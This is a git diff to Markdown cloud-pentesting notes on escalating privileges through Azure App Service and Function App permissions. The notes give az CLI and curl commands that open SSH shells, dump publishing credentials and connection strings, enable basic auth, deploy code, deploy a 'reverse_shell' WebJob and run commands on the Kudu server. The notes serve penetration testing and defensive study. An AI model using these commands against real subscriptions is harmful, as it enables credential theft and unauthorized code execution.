app services

2026-01-14 22:03:11 -08:00 · 2025-01-03 12:21:52 +01:00
parent b340bf8ada
commit 9eec79f700
3 changed files with 255 additions and 83 deletions
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
@@ -10,18 +10,18 @@ For more information about Azure App services check:
 ../az-services/az-app-service.md
 {{#endref}}

-### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read,&#x20;
+### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read

-These permissions allows to call the following commands to get a **SSH shell** inside a web app
+These permissions allows get a **SSH shell** inside a web app. They also allow to **debug** the application.

- Direct option:
+- **SSH in single command**:

 ```bash
 # Direct option
 az webapp ssh --name <name> --resource-group <res-group>
 ```

- Create tunnel and then connect to SSH:
+- **Create tunnel and then connect to SSH**:

 ```bash
 az webapp create-remote-connection --name <name> --resource-group <res-group>
@@ -36,6 +36,180 @@ az webapp create-remote-connection --name <name> --resource-group <res-group>
 ssh root@127.0.0.1 -p 39895
 ```

+- **Debug the application**:
+    1. Install the Azure extension in VScode.
+    2. Login in the extension with the Azure account.
+    3. List all the App services inside the subscription.
+    4. Select the App service you want to debug, right click and select "Start Debugging".
+    5. If the app doesn0t have debugging enabled, the extnsion will try to enable it but your account needs the permission `Microsoft.Web/sites/config/write` to do so.
+
+
+### Microsoft.Web/sites/publish/Action | SCM credentials
+
+The mentioned Azure permission allows to perform several interesting actions that can also be performed with the SCM credentials:
+
+- Read **Webjobs** logs:
+
+```bash
+# Using Azure credentials
+az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt"  --resource "https://management.azure.com/"
+az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt"  --resource "https://management.azure.com/"
+
+# Using SCM username and password:
+curl "<SCM-URL>/vfs/data/jobs/continuous/lala/job_log.txt" \
+  --user '<username>:<password>>' -v
+```
+
+- Create **continuous Webjob**:
+
+```bash
+# Using Azure permissions
+az rest \
+  --method put \
+  --uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
+  --headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
+  --body "@/Users/username/Downloads/rev.js" \
+  --resource "https://management.azure.com/"
+
+# Using SCM credentials
+curl -X PUT \
+  "<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
+  -H 'Content-Disposition: attachment; filename=rev.js' \
+  --data-binary "@/Users/carlospolop/Downloads/rev.js" \
+  --user '<username>:<password>'
+```
+
+### Microsoft.Web/sites/config/list/action
+
+This permission allows to list the **connection strings** and the **appsettings** of the App service which might contain sensitive information like database credentials.
+
+```bash
+az webapp config connection-string list --name <name> --resource-group <res-group>
+az webapp config appsettings list --name <name> --resource-group <res-group>
+```
+
+### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
+
+These permissions allow to **assign a managed identity** to the App service, so if an App service was previously compromised this will allow the attacker to assign new managed identities to the App service and **escalate privileges** to them.
+
+```bash
+az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
+```
+
+
+
+
+
+
+
+
+
+
+### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
+
+This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**:
+
+```bash
+# Get creds
+az functionapp deployment list-publishing-profiles \
+    --name <app-name> \
+    --resource-group <res-name> \
+    --output json
+```
+
+Another option would be to set you own creds and use them using:
+
+```bash
+az functionapp deployment user set \
+    --user-name DeployUser123456 g \
+    --password 'P@ssw0rd123!'
+```
+
+- If **REDACTED** credentials
+
+If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
+
+```bash
+# Enable basic authentication for SCM
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
+    --body '{
+        "properties": {
+            "allow": true
+        }
+    }'
+
+# Enable basic authentication for FTP
+az rest --method PUT \
+    --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
+    --body '{
+        "properties": {
+            "allow": true
+        }
+    }
+```
+
+- **Method SCM**
+
+Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables:
+
+```bash
+# Get settings values
+curl -u '<username>:<password>' \
+    https://<app-name>.scm.azurewebsites.net/api/settings -v
+
+# Deploy code to the funciton
+zip function_app.zip function_app.py # Your code in function_app.py
+curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
+    https://<app-name>.scm.azurewebsites.net/api/zipdeploy
+```
+
+_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
+
+You can also access the web page from `https://<app-name>.scm.azurewebsites.net/BasicAuth`
+
+The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account.
+
+- **Method FTP**
+
+Connect to the FTP server using:
+
+```bash
+# macOS install lftp
+brew install lftp
+
+# Connect using lftp
+lftp -u '<username>','<password>' \
+     ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/
+
+# Some commands
+ls # List
+get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
+put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
+```
+
+_Note that the **FTP username** is usually in the format \<app-name>\\$\<app-name>._
+
+### Microsoft.Web/sites/publish/Action
+
+According to [**the docs**](https://github.com/projectkudu/kudu/wiki/REST-API#command), this permission allows to **execute commands inside the SCM server** which could be used to modify the source code of the application:
+
+```bash
+az rest --method POST \
+  --resource "https://management.azure.com/" \
+  --url "https://newfuncttest123.scm.azurewebsites.net/api/command" \
+  --body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug
+```
+
+### Microsoft.Web/sites/hostruntime/vfs/read
+
+This permission allows to **read the source code** of the app through the VFS:
+
+```bash
+az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
+```
+
+
 {{#include ../../../banners/hacktricks-training.md}}


--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -237,7 +237,7 @@ ngrok http 8000

 - Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code.

-The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , this is where I was hosting the app.
+The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, this is where I was hosting the app.

 ```bash
 # Modify the function
@@ -345,17 +345,6 @@ put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and depl

 _Note that the **FTP username** is usually in the format \<app-name>\\$\<app-name>._

-### Microsoft.Web/sites/publish/Action
-
-According to [**the docs**](https://github.com/projectkudu/kudu/wiki/REST-API#command), this permission allows to **execute commands inside the SCM server** which could be used to modify the source code of the application:
-
-```bash
-az rest --method POST \
-  --resource "https://management.azure.com/" \
-  --url "https://newfuncttest123.scm.azurewebsites.net/api/command" \
-  --body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug
-```
-
 ### Microsoft.Web/sites/hostruntime/vfs/read

 This permission allows to **read the source code** of the app through the VFS:
@@ -366,14 +355,14 @@ az rest --url "https://management.azure.com/subscriptions/<subscription-id>/reso

 ### Microsoft.Web/sites/functions/token/action

-With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code:
+With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code.
+
+However, in my lasts checks no token was returned, so it might be disabled or not working anymore, but here is how you would do it:

 ```bash
 # Get admin token
-az rest --method POST \
-  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01" \
-  --headers '{"Content-Type": "application/json"}' \
-  --debug
+az rest --method GET \
+  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01"

 # Get master key
 curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \